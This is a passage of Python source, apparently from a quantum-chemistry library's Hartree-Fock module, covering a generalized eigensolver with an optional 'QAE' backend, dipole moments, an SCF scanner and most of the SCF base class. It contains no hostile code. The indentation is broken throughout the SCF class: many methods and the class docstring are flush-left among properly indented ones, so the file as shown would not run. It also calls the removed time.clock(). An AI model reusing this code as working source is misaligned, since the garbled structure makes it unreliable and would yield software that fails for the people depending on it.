        dm = reduce(numpy.dot, (c_inv, dm[0]+dm[1], c_inv.T.conj()))

    log.info(' ** Mulliken pop on meta-lowdin orthogonal AOs **')
    # The transformed basis is orthonormal, so pass an identity overlap.
    return mulliken_pop(mol, dm, numpy.eye(orth_coeff.shape[0]), log)
mulliken_pop_meta_lowdin_ao = mulliken_meta
def eig(h, s, eigensolver='SciPy'):
    '''Solver for the generalized eigenvalue problem

    .. math:: HC = SCE

    Args:
        h : 2D ndarray
            Hamiltonian (Fock) matrix.
        s : 2D ndarray
            Overlap (metric) matrix.

    Kwargs:
        eigensolver : str
            'QAE' dispatches to the qae quantum-eigensolver backend; any
            other value (default 'SciPy') uses scipy.linalg.eigh.

    Returns:
        Eigenvalues (1D ndarray) and eigenvectors (columns of a 2D ndarray).
        Each eigenvector's phase is fixed so its largest-magnitude real
        component is positive, making the output deterministic across
        backends.
    '''
    # BUG FIX: eigensolver previously had no default, so the two-argument
    # call in _init_guess_huckel_orbitals raised a TypeError.
    if eigensolver == 'QAE':
        # Import lazily so the qae dependency is only required when the
        # QAE backend is actually requested.
        import qae
        e, c = qae.solve(h, s, nev=h.shape[0])
    else:
        e, c = scipy.linalg.eigh(h, s)

    # Fix the sign gauge: flip any eigenvector whose largest-|real|
    # component is negative.
    idx = numpy.argmax(abs(c.real), axis=0)
    c[:,c[idx,numpy.arange(len(e))].real<0] *= -1
    return e, c
def canonicalize(mf, mo_coeff, mo_occ, fock=None):
    '''Diagonalize the Fock matrix within the doubly-occupied, open-shell and
    virtual subspaces separately, without changing any occupancies.
    '''
    if fock is None:
        fock = mf.get_fock(dm=mf.make_rdm1(mo_coeff, mo_occ))

    docc = mo_occ == 2
    virt = mo_occ == 0
    somo = ~(docc | virt)

    mo_e = numpy.empty(mo_occ.size)
    mo = numpy.empty_like(mo_coeff)
    for subspace in (docc, somo, virt):
        if numpy.count_nonzero(subspace) > 0:
            c_sub = mo_coeff[:, subspace]
            # Fock matrix restricted to this subspace, then diagonalized.
            f_sub = c_sub.conj().T.dot(fock).dot(c_sub)
            e_sub, rot = scipy.linalg.eigh(f_sub)
            mo[:, subspace] = c_sub.dot(rot)
            mo_e[subspace] = e_sub
    return mo_e, mo
def dip_moment(mol, dm, unit='Debye', verbose=logger.NOTE, **kwargs):
    r''' Dipole moment calculation

    .. math::

        \mu_x = -\sum_{\mu}\sum_{\nu} P_{\mu\nu}(\nu|x|\mu) + \sum_A Q_A X_A\\
        \mu_y = -\sum_{\mu}\sum_{\nu} P_{\mu\nu}(\nu|y|\mu) + \sum_A Q_A Y_A\\
        \mu_z = -\sum_{\mu}\sum_{\nu} P_{\mu\nu}(\nu|z|\mu) + \sum_A Q_A Z_A

    where :math:`\mu_x, \mu_y, \mu_z` are the x, y and z components of dipole
    moment

    Args:
         mol: an instance of :class:`Mole`
         dm : a 2D ndarrays density matrices

    Return:
        A list: the dipole moment on x, y and z component
    '''
    log = logger.new_logger(mol, verbose)

    if 'unit_symbol' in kwargs:  # pragma: no cover
        log.warn('Kwarg "unit_symbol" was deprecated. It was replaced by kwarg '
                 'unit since PySCF-1.5.')
        unit = kwargs['unit_symbol']

    if not (isinstance(dm, numpy.ndarray) and dm.ndim == 2):
        # UHF density matrices: spin-trace them first.
        dm = dm[0] + dm[1]

    # Electronic contribution, with the gauge origin fixed at (0,0,0).
    with mol.with_common_orig((0,0,0)):
        ao_dip = mol.intor_symmetric('int1e_r', comp=3)
    el_dip = numpy.einsum('xij,ji->x', ao_dip, dm).real

    # Nuclear contribution: charge-weighted sum of nuclear coordinates.
    charges = mol.atom_charges()
    coords = mol.atom_coords()
    nucl_dip = numpy.einsum('i,ix->x', charges, coords)
    mol_dip = nucl_dip - el_dip

    if unit.upper() == 'DEBYE':
        mol_dip *= nist.AU2DEBYE
        log.note('Dipole moment(X, Y, Z, Debye): %8.5f, %8.5f, %8.5f', *mol_dip)
    else:
        log.note('Dipole moment(X, Y, Z, A.U.): %8.5f, %8.5f, %8.5f', *mol_dip)
    return mol_dip
def uniq_var_indices(mo_occ):
    '''
    Boolean mask selecting the unique variables of the orbital-gradient
    (or orbital-rotation) matrix: rotations from an occupied orbital into
    a virtual one, evaluated per spin channel.
    '''
    occ_a = mo_occ > 0
    occ_b = mo_occ == 2
    return (~occ_a[:,None] & occ_a) | (~occ_b[:,None] & occ_b)
def pack_uniq_var(x, mo_occ):
    '''
    Extract the unique variables from the full orbital-gradient (or
    orbital-rotation) matrix.
    '''
    mask = uniq_var_indices(mo_occ)
    return x[mask]
def unpack_uniq_var(dx, mo_occ):
    '''
    Fill the full orbital-rotation (or orbital-gradient) matrix from its
    unique variables; the result is anti-hermitian by construction.
    '''
    nmo = len(mo_occ)
    mask = uniq_var_indices(mo_occ)
    full = numpy.zeros((nmo,nmo), dtype=dx.dtype)
    full[mask] = dx
    return full - full.conj().T
def as_scanner(mf):
    '''Generating a scanner/solver for HF PES.

    The returned solver is a function. This function requires one argument
    "mol" as input and returns total HF energy.

    The solver will automatically use the results of last calculation as the
    initial guess of the new calculation.  All parameters assigned in the
    SCF object (DIIS, conv_tol, max_memory etc) are automatically applied in
    the solver.

    Note scanner has side effects.  It may change many underlying objects
    (_scf, with_df, with_x2c, ...) during calculation.

    Examples:

    >>> from pyscf import gto, scf
    >>> hf_scanner = scf.RHF(gto.Mole().set(verbose=0)).as_scanner()
    >>> hf_scanner(gto.M(atom='H 0 0 0; F 0 0 1.1'))
    -98.552190448277955
    >>> hf_scanner(gto.M(atom='H 0 0 0; F 0 0 1.5'))
    -98.414750424294368
    '''
    if isinstance(mf, lib.SinglePointScanner):
        # Already a scanner; return it unchanged.
        return mf

    logger.info(mf, 'Create scanner for %s', mf.__class__)

    class SCF_Scanner(mf.__class__, lib.SinglePointScanner):
        def __init__(self, mf_obj):
            # Adopt all settings and state of the wrapped SCF object.
            self.__dict__.update(mf_obj.__dict__)

        def __call__(self, mol_or_geom, **kwargs):
            # Accept either a Mole object or a raw geometry specification.
            if isinstance(mol_or_geom, gto.Mole):
                mol = mol_or_geom
            else:
                mol = self.mol.set_geom_(mol_or_geom, inplace=False)

            # Cleanup intermediates associated to the previous mol object
            self.reset(mol)

            # Pick the starting density: explicit dm0 kwarg, nothing (no
            # previous MOs), the checkpoint file, or the last converged DM.
            if 'dm0' in kwargs:
                dm0 = kwargs.pop('dm0')
            elif self.mo_coeff is None:
                dm0 = None
            elif self.chkfile and h5py.is_hdf5(self.chkfile):
                dm0 = self.from_chk(self.chkfile)
            else:
                dm0 = self.make_rdm1()
                # dm0 form last calculation cannot be used in the current
                # calculation if a completely different system is given.
                # Obviously, the systems are very different if the number of
                # basis functions are different.
                # TODO: A robust check should include more comparison on
                # various attributes between current `mol` and the `mol` in
                # last calculation.
                if dm0.shape[-1] != mol.nao:
                    #TODO:
                    #from pyscf.scf import addons
                    #if numpy.any(last_mol.atom_charges() != mol.atom_charges()):
                    #    dm0 = None
                    #elif non-relativistic:
                    #    addons.project_dm_nr2nr(last_mol, dm0, last_mol)
                    #else:
                    #    addons.project_dm_r2r(last_mol, dm0, last_mol)
                    dm0 = None
            self.mo_coeff = None  # To avoid last mo_coeff being used by SOSCF
            e_tot = self.kernel(dm0=dm0, **kwargs)
            return e_tot

    return SCF_Scanner(mf)
############
class SCF(lib.StreamObject):
'''SCF base class. non-relativistic RHF.
Attributes:
verbose : int
Print level. Default value equals to :class:`Mole.verbose`
max_memory : float or int
Allowed memory in MB. Default equals to :class:`Mole.max_memory`
chkfile : str
checkpoint file to save MOs, orbital energies etc. Writing to
chkfile can be disabled if this attribute is set to None or False.
conv_tol : float
converge threshold. Default is 1e-9
conv_tol_grad : float
gradients converge threshold. Default is sqrt(conv_tol)
max_cycle : int
max number of iterations. If max_cycle <= 0, SCF iteration will
be skiped and the kernel function will compute only the total
energy based on the intial guess. Default value is 50.
init_guess : str
initial guess method. It can be one of 'minao', 'atom', 'huckel', 'hcore', '1e', 'chkfile'.
Default is 'minao'
DIIS : DIIS class
The class to generate diis object. It can be one of
diis.SCF_DIIS, diis.ADIIS, diis.EDIIS.
diis : boolean or object of DIIS class defined in :mod:`scf.diis`.
Default is the object associated to the attribute :attr:`self.DIIS`.
Set it to None/False to turn off DIIS.
Note if this attribute is inialized as a DIIS object, the SCF driver
will use this object in the iteration. The DIIS informations (vector
basis and error vector) will be held inside this object. When kernel
function is called again, the old states (vector basis and error
vector) will be reused.
diis_space : int
DIIS space size. By default, 8 Fock matrices and errors vector are stored.
diis_start_cycle : int
The step to start DIIS. Default is 1.
diis_file: 'str'
File to store DIIS vectors and error vectors.
level_shift : float or int
Level shift (in AU) for virtual space. Default is 0.
direct_scf : bool
Direct SCF is used by default.
direct_scf_tol : float
Direct SCF cutoff threshold. Default is 1e-13.
callback : function(envs_dict) => None
callback function takes one dict as the argument which is
generated by the builtin function :func:`locals`, so that the
callback function can access all local variables in the current
envrionment.
conv_check : bool
An extra cycle to check convergence after SCF iterations.
check_convergence : function(envs) => bool
A hook for overloading convergence criteria in SCF iterations.
Saved results:
converged : bool
SCF converged or not
e_tot : float
Total HF energy (electronic energy plus nuclear repulsion)
mo_energy :
Orbital energies
mo_occ
Orbital occupancy
mo_coeff
Orbital coefficients
Examples:
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1', basis='cc-pvdz')
>>> mf = scf.hf.SCF(mol)
>>> mf.verbose = 0
>>> mf.level_shift = .4
>>> mf.scf()
-1.0811707843775884
'''
conv_tol = getattr(__config__, 'scf_hf_SCF_conv_tol', 1e-9)
conv_tol_grad = getattr(__config__, 'scf_hf_SCF_conv_tol_grad', None)
max_cycle = getattr(__config__, 'scf_hf_SCF_max_cycle', 50)
init_guess = getattr(__config__, 'scf_hf_SCF_init_guess', 'minao')
# To avoid diis pollution form previous run, self.diis should not be
# initialized as DIIS instance here
DIIS = diis.SCF_DIIS
diis = getattr(__config__, 'scf_hf_SCF_diis', True)
diis_space = getattr(__config__, 'scf_hf_SCF_diis_space', 8)
# need > 0 if initial DM is numpy.zeros array
diis_start_cycle = getattr(__config__, 'scf_hf_SCF_diis_start_cycle', 1)
diis_file = None
# Give diis_space_rollback=True a trial if all other methods do not converge
diis_space_rollback = False
damp = getattr(__config__, 'scf_hf_SCF_damp', 0)
level_shift = getattr(__config__, 'scf_hf_SCF_level_shift', 0)
direct_scf = getattr(__config__, 'scf_hf_SCF_direct_scf', True)
direct_scf_tol = getattr(__config__, 'scf_hf_SCF_direct_scf_tol', 1e-13)
conv_check = getattr(__config__, 'scf_hf_SCF_conv_check', True)
eigensolver = 'SciPy'
    def __init__(self, mol):
        '''Initialize the SCF state from a built Mole object.

        Result attributes (mo_energy, mo_coeff, mo_occ, e_tot, converged,
        scf_summary) are reset here; see the class docstring for details.
        '''
        if not mol._built:
            sys.stderr.write('Warning: %s must be initialized before calling SCF.\n'
                             'Initialize %s in %s\n' % (mol, mol, self))
            mol.build()
        self.mol = mol
        self.verbose = mol.verbose
        self.max_memory = mol.max_memory
        self.stdout = mol.stdout

        # If chkfile is muted, SCF intermediates will not be dumped anywhere.
        if MUTE_CHKFILE:
            self.chkfile = None
        else:
            # the chkfile will be removed automatically, to save the chkfile, assign a
            # filename to self.chkfile
            self._chkfile = tempfile.NamedTemporaryFile(dir=lib.param.TMPDIR)
            self.chkfile = self._chkfile.name

        # don't modify the following attributes, they are not input options
        self.mo_energy = None
        self.mo_coeff = None
        self.mo_occ = None
        self.e_tot = 0
        self.converged = False
        self.callback = None
        self.scf_summary = {}

        self.opt = None
        self._eri = None  # Note: self._eri requires large amount of memory
        # Declare the recognized input attributes for check_sanity.
        keys = set(('conv_tol', 'conv_tol_grad', 'max_cycle', 'init_guess',
                    'DIIS', 'diis', 'diis_space', 'diis_start_cycle',
                    'diis_file', 'diis_space_rollback', 'damp', 'level_shift',
                    'direct_scf', 'direct_scf_tol', 'conv_check', 'eigensolver'))
        self._keys = set(self.__dict__.keys()).union(keys)
def build(self, mol=None):
if mol is None: mol = self.mol
if self.verbose >= logger.WARN:
self.check_sanity()
# lazily initialize direct SCF
self.opt = None
return self
    def dump_flags(self, verbose=None):
        '''Log the SCF configuration: method chain, guess, damping, DIIS and
        convergence settings.'''
        log = logger.new_logger(self, verbose)
        if log.verbose < logger.INFO:
            return self

        log.info('\n')
        log.info('******** %s ********', self.__class__)
        # Report the concrete SCF subclasses in the MRO (e.g. RHF), SCF excluded.
        method = [cls.__name__ for cls in self.__class__.__mro__
                  if issubclass(cls, SCF) and cls != SCF]
        log.info('method = %s', '-'.join(method))
        log.info('initial guess = %s', self.init_guess)
        log.info('damping factor = %g', self.damp)
        log.info('level_shift factor = %s', self.level_shift)
        if isinstance(self.diis, lib.diis.DIIS):
            # A live DIIS object was supplied; report its own settings.
            log.info('DIIS = %s', self.diis)
            log.info('diis_start_cycle = %d', self.diis_start_cycle)
            log.info('diis_space = %d', self.diis.space)
        elif self.diis:
            log.info('DIIS = %s', self.DIIS)
            log.info('diis_start_cycle = %d', self.diis_start_cycle)
            log.info('diis_space = %d', self.diis_space)
        log.info('SCF conv_tol = %g', self.conv_tol)
        log.info('SCF conv_tol_grad = %s', self.conv_tol_grad)
        log.info('SCF max_cycles = %d', self.max_cycle)
        log.info('direct_scf = %s', self.direct_scf)
        if self.direct_scf:
            log.info('direct_scf_tol = %g', self.direct_scf_tol)
        if self.chkfile:
            log.info('chkfile to save SCF result = %s', self.chkfile)
        log.info('max_memory %d MB (current use %d MB)',
                 self.max_memory, lib.current_memory()[0])
        return self
    def _eigh(self, h, s):
        # Low-level generalized eigensolver hook; per the note in eig(),
        # subclasses redefine this while eig() carries higher-level tweaks.
        return eig(h, s, self.eigensolver)
    @lib.with_doc(eig.__doc__)
    def eig(self, h, s):
        # An intermediate call to self._eigh so that the modification to eig function
        # can be applied on different level.  Different SCF modules like RHF/UHF
        # redefine only the eig solver and leave the other modifications (like
        # removing linear dependence, sorting eigenvalues) to low level ._eigh
        return self._eigh(h, s)
def get_hcore(self, mol=None):
if mol is None: mol = self.mol
return get_hcore(mol)
def get_ovlp(self, mol=None):
if mol is None: mol = self.mol
return get_ovlp(mol)
get_fock = get_fock
get_occ = get_occ
    @lib.with_doc(get_grad.__doc__)
    def get_grad(self, mo_coeff, mo_occ, fock=None):
        # Build the Fock matrix from the current density when not supplied.
        if fock is None:
            dm1 = self.make_rdm1(mo_coeff, mo_occ)
            fock = self.get_hcore(self.mol) + self.get_veff(self.mol, dm1)
        return get_grad(mo_coeff, mo_occ, fock)
    def dump_chk(self, envs):
        # Persist the current SCF state (energy, MOs, occupations) to the
        # checkpoint file, if one is configured.  *envs* is the local-variable
        # environment dict supplied by the SCF driver.
        if self.chkfile:
            chkfile.dump_scf(self.mol, self.chkfile,
                             envs['e_tot'], envs['mo_energy'],
                             envs['mo_coeff'], envs['mo_occ'],
                             overwrite_mol=False)
        return self
@lib.with_doc(init_guess_by_minao.__doc__)
def init_guess_by_minao(self, mol=None):
if mol is None: mol = self.mol
return init_guess_by_minao(mol)
    @lib.with_doc(init_guess_by_atom.__doc__)
    def init_guess_by_atom(self, mol=None):
        # Superposition-of-atomic-densities guess, delegated to the module
        # function after logging the choice.
        if mol is None: mol = self.mol
        logger.info(self, 'Initial guess from superposition of atomic densities.')
        return init_guess_by_atom(mol)
    @lib.with_doc(init_guess_by_huckel.__doc__)
    def init_guess_by_huckel(self, mol=None):
        # Extended-Hueckel guess: obtain Hueckel orbitals, occupy them with
        # this object's Aufbau rule, and return the resulting density matrix.
        if mol is None: mol = self.mol
        logger.info(self, 'Initial guess from on-the-fly Huckel, doi:10.1021/acs.jctc.8b01089.')
        mo_energy, mo_coeff = _init_guess_huckel_orbitals(mol)
        mo_occ = self.get_occ(mo_energy, mo_coeff)
        return self.make_rdm1(mo_coeff, mo_occ)
@lib.with_doc(init_guess_by_1e.__doc__)
def init_guess_by_1e(self, mol=None):
if mol is None: mol = self.mol
logger.info(self, 'Initial guess from hcore.')
h1e = self.get_hcore(mol)
s1e = self.get_ovlp(mol)
mo_energy, mo_coeff = self.eig(h1e, s1e)
mo_occ = self.get_occ(mo_energy, mo_coeff)
return self.make_rdm1(mo_coeff, mo_occ)
    @lib.with_doc(init_guess_by_chkfile.__doc__)
    def init_guess_by_chkfile(self, chkfile=None, project=None):
        # Guard against the pre-API-change call signature that passed a Mole.
        if isinstance(chkfile, gto.Mole):
            raise TypeError('''
    You see this error message because of the API updates.
    The first argument needs to be the name of a chkfile.''')
        if chkfile is None: chkfile = self.chkfile
        return init_guess_by_chkfile(self.mol, chkfile, project=project)
    def from_chk(self, chkfile=None, project=None):
        # Convenience alias of init_guess_by_chkfile (doc copied below).
        return self.init_guess_by_chkfile(chkfile, project)
    from_chk.__doc__ = init_guess_by_chkfile.__doc__
    def get_init_guess(self, mol=None, key='minao'):
        # Build an initial-guess density matrix selected by *key*.  A
        # non-string *key* is assumed to already be a density matrix.
        # NOTE(review): ``unicode`` must be a module-level py2-compat alias;
        # confirm it is defined elsewhere in this file.
        if not isinstance(key, (str, unicode)):
            return key
        key = key.lower()
        if mol is None:
            mol = self.mol
        if key == '1e' or key == 'hcore':
            dm = self.init_guess_by_1e(mol)
        elif key == 'huckel':
            dm = self.init_guess_by_huckel(mol)
        elif getattr(mol, 'natm', 0) == 0:
            # Checked before 'atom'/'minao': those guesses need atoms.
            logger.info(self, 'No atom found in mol. Use 1e initial guess')
            dm = self.init_guess_by_1e(mol)
        elif key == 'atom':
            dm = self.init_guess_by_atom(mol)
        elif key == 'vsap' and hasattr(self, 'init_guess_by_vsap'):
            # Only available for DFT objects
            dm = self.init_guess_by_vsap(mol)
        elif key[:3] == 'chk':
            try:
                dm = self.init_guess_by_chkfile()
            except (IOError, KeyError):
                logger.warn(self, 'Fail in reading %s. Use MINAO initial guess',
                            self.chkfile)
                dm = self.init_guess_by_minao(mol)
        else:
            dm = self.init_guess_by_minao(mol)
        if self.verbose >= logger.DEBUG1:
            # Debug check: electron count implied by the guess, tr(D S).
            s = self.get_ovlp()
            if isinstance(dm, numpy.ndarray) and dm.ndim == 2:
                nelec = numpy.einsum('ij,ji', dm, s).real
            else: # UHF
                nelec =(numpy.einsum('ij,ji', dm[0], s).real,
                        numpy.einsum('ij,ji', dm[1], s).real)
            logger.debug1(self, 'Nelec from initial guess = %s', nelec)
        return dm
    # full density matrix for RHF
    @lib.with_doc(make_rdm1.__doc__)
    def make_rdm1(self, mo_coeff=None, mo_occ=None, **kwargs):
        # Default to the converged orbitals/occupations stored on the object.
        if mo_occ is None: mo_occ = self.mo_occ
        if mo_coeff is None: mo_coeff = self.mo_coeff
        return make_rdm1(mo_coeff, mo_occ, **kwargs)
    # Module-level energy evaluators bound as methods.
    energy_elec = energy_elec
    energy_tot = energy_tot
    def energy_nuc(self):
        # Nuclear repulsion energy, delegated to the Mole object.
        return self.mol.energy_nuc()
# A hook for overloading convergence criteria in SCF iterations. Assigning
# a function
# f(envs) => bool
# to check_convergence can overwrite the default convergence criteria
check_convergence = None
def scf(self, dm0=None, **kwargs):
'''SCF main driver
Kwargs:
dm0 : ndarray
If given, it will be used as the initial guess density matrix
Examples:
>>> import numpy
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; F 0 0 1.1')
>>> mf = scf.hf.SCF(mol)
>>> dm_guess = numpy.eye(mol.nao_nr())
>>> mf.kernel(dm_guess)
converged SCF energy = -98.5521904482821
-98.552190448282104
'''
cput0 = (time.clock(), time.time())
self.dump_flags()
self.build(self.mol)
if self.max_cycle > 0 or self.mo_coeff is None:
self.converged, self.e_tot, \
self.mo_energy, self.mo_coeff, self.mo_occ = \
kernel(self, self.conv_tol, self.conv_tol_grad,
dm0=dm0, callback=self.callback,
conv_check=self.conv_check, **kwargs)
else:
# Avoid to update SCF orbitals in the non-SCF initialization
# (issue #495). But run regular SCF for initial guess if SCF was
# not initialized.
self.e_tot = kernel(self, self.conv_tol, self.conv_tol_grad,
dm0=dm0, callback=self.callback,
conv_check=self.conv_check, **kwargs)[1]
logger.timer(self, 'SCF', *cput0)
self._finalize()
return self.e_tot
kernel = lib.alias(scf, alias_name='kernel')
def _finalize(self):
'''Hook for dumping results and clearing up the object.'''
if self.converged:
logger.note(self, 'converged SCF energy = %.15g', self.e_tot)
else:
logger.note(self, 'SCF not converged.')
logger.note(self, 'SCF energy = %.15g', self.e_tot)
return self
    def init_direct_scf(self, mol=None):
        # Build the direct-SCF integral prescreening optimizer (VHFOpt).
        if mol is None: mol = self.mol
        # Integrals < direct_scf_tol may be set to 0 in int2e.
        # Higher accuracy is required for Schwartz inequality prescreening.
        with mol.with_integral_screen(self.direct_scf_tol**2):
            opt = _vhf.VHFOpt(mol, 'int2e', 'CVHFnrs8_prescreen',
                              'CVHFsetnr_direct_scf',
                              'CVHFsetnr_direct_scf_dm')
            opt.direct_scf_tol = self.direct_scf_tol
        return opt
@lib.with_doc(get_jk.__doc__)
def get_jk(self, mol=None, dm=None, hermi=1, with_j=True, with_k=True,
omega=None):
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
cpu0 = (time.clock(), time.time())
if self.direct_scf and self.opt is None:
self.opt = self.init_direct_scf(mol)
if with_j and with_k:
vj, vk = get_jk(mol, dm, hermi, self.opt, with_j, with_k, omega)
else:
if with_j:
prescreen = 'CVHFnrs8_vj_prescreen'
else:
prescreen = 'CVHFnrs8_vk_prescreen'
with lib.temporary_env(self.opt, prescreen=prescreen):
vj, vk = get_jk(mol, dm, hermi, self.opt, with_j, with_k, omega)
logger.timer(self, 'vj and vk', *cpu0)
return vj, vk
def get_j(self, mol=None, dm=None, hermi=1, omega=None):
'''Compute J matrices for all input density matrices
'''
return self.get_jk(mol, dm, hermi, with_k=False, omega=omega)[0]
def get_k(self, mol=None, dm=None, hermi=1, omega=None):
'''Compute K matrices for all input density matrices
'''
return self.get_jk(mol, dm, hermi, with_j=False, omega=omega)[1]
    @lib.with_doc(get_veff.__doc__)
    def get_veff(self, mol=None, dm=None, dm_last=0, vhf_last=0, hermi=1):
        # Be carefule with the effects of :attr:`SCF.direct_scf` on this function
        if mol is None: mol = self.mol
        if dm is None: dm = self.make_rdm1()
        if self.direct_scf:
            # Incremental build: contract only the density difference and add
            # the previous potential on top (prescreening-friendly).
            ddm = numpy.asarray(dm) - dm_last
            vj, vk = self.get_jk(mol, ddm, hermi=hermi)
            return vhf_last + vj - vk * .5
        else:
            vj, vk = self.get_jk(mol, dm, hermi=hermi)
            return vj - vk * .5
    @lib.with_doc(analyze.__doc__)
    def analyze(self, verbose=None, with_meta_lowdin=WITH_META_LOWDIN,
                **kwargs):
        # Delegate to the module-level analysis with this object's verbosity.
        if verbose is None: verbose = self.verbose
        return analyze(self, verbose, with_meta_lowdin, **kwargs)
    # Module-level summary printer bound as a method.
    dump_scf_summary = dump_scf_summary
@lib.with_doc(mulliken_pop.__doc__)
def mulliken_pop(self, mol=None, dm=None, s=None, verbose=logger.DEBUG):
if mol is None: mol = self.mol
if dm is None: dm = self.make_rdm1()
if s is None: s = self.get_ovlp(mol)
return mulliken_pop(mol, dm, s=s, verbose=verbose)
    @lib.with_doc(mulliken_meta.__doc__)
    def mulliken_meta(self, mol=None, dm=None, verbose=logger.DEBUG,
                      pre_orth_method=PRE_ORTH_METHOD, s=None):
        # Meta-Lowdin Mulliken analysis; defaults come from the SCF state.
        if mol is None: mol = self.mol
        if dm is None: dm = self.make_rdm1()
        if s is None: s = self.get_ovlp(mol)
        return mulliken_meta(mol, dm, s=s, verbose=verbose,
                             pre_orth_method=pre_orth_method)
    def pop(self, *args, **kwargs):
        # Short alias for mulliken_meta (doc copied below).
        return self.mulliken_meta(*args, **kwargs)
    pop.__doc__ = mulliken_meta.__doc__
    # Backward-compatible aliases.
    mulliken_pop_meta_lowdin_ao = pop
    canonicalize = canonicalize
@lib.with_doc(dip_moment.__doc__)
def dip_moment(self, mol=None, dm=None, unit='Debye', verbose=logger.NOTE,
**kwargs):
if mol is None: mol = self.mol
if dm is None: dm =self.make_rdm1()
return dip_moment(mol, dm, unit, verbose=verbose, **kwargs)
def _is_mem_enough(self):
nbf = self.mol.nao_nr()
return nbf**4/1e6+lib.current_memory()[0] < self.max_memory*.95
    def density_fit(self, auxbasis=None, with_df=None, only_dfj=False):
        # Return a density-fitted decoration of this mean-field object.
        import pyscf.df.df_jk
        return pyscf.df.df_jk.density_fit(self, auxbasis, with_df, only_dfj)
    def sfx2c1e(self):
        # Apply the spin-free exact-two-component (scalar relativistic)
        # decoration to this mean-field object.
        import pyscf.x2c.sfx2c1e
        return pyscf.x2c.sfx2c1e.sfx2c1e(self)
    # Aliases for the same decoration.
    x2c1e = sfx2c1e
    x2c = x2c1e
    def newton(self):
        # Return a second-order (Newton/augmented-Hessian) SCF decoration.
        import pyscf.soscf.newton_ah
        return pyscf.soscf.newton_ah.newton(self)
    def nuc_grad_method(self): # pragma: no cover
        '''Hook to create object for analytical nuclear gradients.'''
        # Base class has no gradients implementation; subclasses override.
        pass
    def update_(self, chkfile=None):
        '''Read attributes from the chkfile then replace the attributes of
        current object. It's an alias of function update_from_chk_.
        '''
        from pyscf.scf import chkfile as chkmod
        if chkfile is None: chkfile = self.chkfile
        # Overwrite the object's attributes in-place with the stored state.
        self.__dict__.update(chkmod.load(chkfile, 'scf'))
        return self
    update_from_chk = update_from_chk_ = update = update_
    # Module-level scanner factory bound as a method.
    as_scanner = as_scanner
def reset(self, mol=None):
'''Reset mol and relevant attributes associated to the old mol object'''
if mol is not None:
self.mol = mol
self.opt = None
self._eri = None
return self
@property
def hf_energy(self): # pragma: no cover
sys.stderr.write('WARN: Attribute .hf_energy will be removed in PySCF v1.1. '
'It is replaced by attribute .e_tot\n')
return self.e_tot
@hf_energy.setter
def hf_energy(self, x): # pragma: no cover
sys.stderr.write('WARN: Attribute .hf_energy will be removed in PySCF v1.1. '
'It is replaced by attribute .e_tot\n')
self.hf_energy = x
    @property
    def level_shift_factor(self): # pragma: no cover
        # Deprecated alias of .level_shift; warns on every access.
        sys.stderr.write('WARN: Attribute .level_shift_factor will be removed in PySCF v1.1. '
                         'It is replaced by attribute .level_shift\n')
        return self.level_shift
    @level_shift_factor.setter
    def level_shift_factor(self, x): # pragma: no cover
        sys.stderr.write('WARN: Attribute .level_shift_factor will be removed in PySCF v1.1. '
                         'It is replaced by attribute .level_shift\n')
        self.level_shift = x
    @property
    def damp_factor(self): # pragma: no cover
        # Deprecated alias of .damp; warns on every access.
        sys.stderr.write('WARN: Attribute .damp_factor will be removed in PySCF v1.1. '
                         'It is replaced by attribute .damp\n')
        return self.damp
    @damp_factor.setter
    def damp_factor(self, x): # pragma: no cover
        sys.stderr.write('WARN: Attribute .damp_factor will be removed in PySCF v1.1. '
                         'It is replaced by attribute .damp\n')
        self.damp = x
    def apply(self, fn, *args, **kwargs):
        # Apply a callable, or dispatch a post-SCF method by name (e.g.
        # 'MP2', 'CCSD') looked up across the mp/cc/ci/mcscf/tdscf modules.
        # NOTE(review): ``unicode`` must be a module-level py2-compat alias;
        # confirm it is defined elsewhere in this file.
        if callable(fn):
            return lib.StreamObject.apply(self, fn, *args, **kwargs)
        elif isinstance(fn, (str, unicode)):
            from pyscf import mp, cc, ci, mcscf, tdscf
            for mod in (mp, cc, ci, mcscf, tdscf):
                method = getattr(mod, fn.upper(), None)
                if method is not None and callable(method):
                    # Run the SCF first if it has not been solved yet.
                    if self.mo_coeff is None:
                        logger.warn(self, 'SCF object must be initialized '
                                    'before calling post-SCF methods.\n'
                                    'Initialize %s for %s', self, mod)
                        self.kernel()
                    return method(self, *args, **kwargs)
            raise ValueError('Unknown method %s' % fn)
        else:
            raise TypeError('First argument of .apply method must be a '
                            'function/class or a name (string) of a method.')
    def to_rhf(self):
        '''Convert the input mean-field object to a RHF/ROHF object.
        Note this conversion only changes the class of the mean-field object.
        The total energy and wave-function are the same as them in the input
        mean-field object.
        '''
        from pyscf.scf import addons
        mf = addons.convert_to_rhf(self)
        # A genuinely different reference (e.g. UHF -> RHF) invalidates the
        # converged flag; a plain RHF object keeps it.
        if not isinstance(self, RHF):
            mf.converged = False
        return mf
def to_uhf(self):
'''Convert the input mean-field object to a UHF object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf.scf import addons
return addons.convert_to_uhf(self)
    def to_ghf(self):
        '''Convert the input mean-field object to a GHF object.
        Note this conversion only changes the class of the mean-field object.
        The total energy and wave-function are the same as them in the input
        mean-field object.
        '''
        from pyscf.scf import addons
        return addons.convert_to_ghf(self)
def to_rks(self, xc='HF'):
'''Convert the input mean-field object to a RKS/ROKS object.
Note this conversion only changes the class of the mean-field object.
The total energy and wave-function are the same as them in the input
mean-field object.
'''
from pyscf import dft
mf = dft.RKS(self.mol, xc=xc)
mf.__dict__.update(self.to_rhf().__dict__)
mf.converged = False
return mf
    def to_uks(self, xc='HF'):
        '''Convert the input mean-field object to a UKS object.
        Note this conversion only changes the class of the mean-field object.
        The total energy and wave-function are the same as them in the input
        mean-field object.
        '''
        from pyscf import dft
        mf = dft.UKS(self.mol, xc=xc)
        # Copy the state over; the new functional makes it non-converged.
        mf.__dict__.update(self.to_uhf().__dict__)
        mf.converged = False
        return mf
    def to_gks(self, xc='HF'):
        '''Convert the input mean-field object to a GKS object.
        Note this conversion only changes the class of the mean-field object.
        The total energy and wave-function are the same as them in the input
        mean-field object.
        '''
        from pyscf import dft
        mf = dft.GKS(self.mol, xc=xc)
        # Copy the state over; the new functional makes it non-converged.
        mf.__dict__.update(self.to_ghf().__dict__)
        mf.converged = False
        return mf
############
class RHF(SCF):
    __doc__ = SCF.__doc__
    def check_sanity(self):
        # Warn for spin-polarized molecules (spin != 0), except the trivial
        # one-electron case, before running the base-class checks.
